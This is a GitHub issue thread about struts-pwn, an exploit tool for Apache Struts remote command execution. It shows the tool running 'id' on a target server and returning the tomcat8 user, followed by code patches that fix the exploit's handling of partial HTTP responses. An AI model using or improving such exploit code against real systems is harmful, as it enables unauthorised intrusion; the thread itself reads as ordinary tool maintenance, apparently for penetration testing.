Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Issue with requests partial read #8

Closed
Reboare opened this issue Mar 4, 2018 · 6 comments
Closed

Issue with requests partial read #8

Reboare opened this issue Mar 4, 2018 · 6 comments

Comments

@Reboare
Copy link
Contributor

Reboare commented Mar 4, 2018

Urls have been obfuscated. On a vulnerable struts server, using the default struts-pwn, an IncompleteRead is returned with 0 bytes

root@kali:~/CVE-2017-12617/struts-pwn# python struts-pwn.py -u http://xxxx/test.action

[*] URL: xxxx/test.action
[*] CMD: id
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
ERROR
[%] Done.

If this is swapped to be urllib2 however, a partial response is received:

    try:
        #rq = requests.get(url, headers=headers, timeout=timeout, allow_redirects=False) 
        #output = rq.text
        request = urllib2.Request(url, headers=headers)
        request = urllib2.urlopen(request).read()
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        print e.partial
        output = 'ERROR'
    return(output)
root@kali:~/CVE-2017-12617/struts-pwn# python struts-pwn.py -u http://xxxx/test.action

[*] URL: http://xxxx/test.action
[*] CMD: id
EXCEPTION::::--> IncompleteRead(54 bytes read)
uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

ERROR
[%] Done.

I've yet to identify what behind the scenes is causing this error. Urllib3 appears to have the same behaviour as urllib2 (although I can't work out how to decode the response). Any idea if the way requests is working is causing issues?

@mazen160
Copy link
Owner

mazen160 commented Mar 4, 2018

Hi @Reboare ,

This is a very rare issue. I remember it was reported one time before, but the solution was indirect and could lead to further errors.

I'm not sure how to fix this issue in the best possible approach

@Reboare
Copy link
Contributor Author

Reboare commented Mar 4, 2018

Thanks for the reply, I'm going to have a play around and see if I can find the fix it. What was the indirect solution?

@mazen160
Copy link
Owner

mazen160 commented Mar 4, 2018

Here is the previous solution for the issue:

---
 struts-pwn.py | 17 +++++++++++------
 1 file changed, 11 insertions(+), 6 deletions(-)

diff --git a/struts-pwn.py b/struts-pwn.py
index df93d83..b8db48f 100755
--- a/struts-pwn.py
+++ b/struts-pwn.py
@@ -91,13 +91,18 @@ def exploit(url, cmd):
     }
 
     timeout = 3
+    s = []
     try:
-        output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
-    except Exception as e:
-        print("EXCEPTION::::--> " + str(e))
-        output = 'ERROR'
-    return(output)
-
+        output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False, stream=True)
+        if output.encoding is None:
+            output.encoding = 'utf-8'
+        for line in output.iter_content(chunk_size=None,decode_unicode=True):
+            s.append(line)
+            command_response = "".join(s)
+        output.close 
+    except:
+        pass
+    return(command_response)
 
 def check(url):
     url = url_prepare(url)
-- 

@mazen160
Copy link
Owner

mazen160 commented Mar 4, 2018

Great!

Feel free to check it, and please let me know if you find another approach for solving the issue

@Reboare
Copy link
Contributor Author

Reboare commented Mar 4, 2018

I've found a few approaches. It seems requests doesn't handle IncompleteRead's well at all and will happily throw away any data it finds.

One involves re-implementing in urllib2, which is far from ideal.

Alternatively re-raising a request in the event of a ChunkedEncodingError, which will then handle the IncompleteRead is possible, but then it means sending two connection requests each time, which is a bit messy. I could add a flag to allow handling this, but that's really just adding cruft.

The only other solution I can see is very similar to the above although I've tried to clean it up a bit and add correct error handling:

    try:
        with requests.get(url, headers=headers, timeout=timeout, allow_redirects=False, stream=True) as rq:
            output = ""
            for i in rq.iter_content():
                output += i
    except requests.exceptions.ChunkedEncodingError as e:
        print("EXCEPTION::::--> " + str(e))
        print("Server is prematurely closing connection!")
    except Exception as e:
        print type(e)
        print("EXCEPTION::::--> " + str(e))
        output = 'ERROR'
    return(output)

By delaying the request to later and then reading the content byte by byte, this should handle closing the request healthily by wrapping it within the with block, as I believe the above solution would still cause an error but leave the connection hanging. In the event of an IncompleteRead, the first Exception is always hit, but it means any recovered data can be returned without it being discarded.

Would you be happy with this solution if I were to clean it up and submit a pull? Effectively it's acting in a similar manner to under the hood, and I'm more than happy to add the stuff .text does to handle unicode/apparent encoding

@mazen160
Copy link
Owner

mazen160 commented Mar 4, 2018

Hi @Reboare ,

This will be a great addition!. I would be totally happy implementing your solution to the repo. Once you make a pull request, I will test it on a local testing VM and then merge it to master.

Thanks again for your time and interest!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants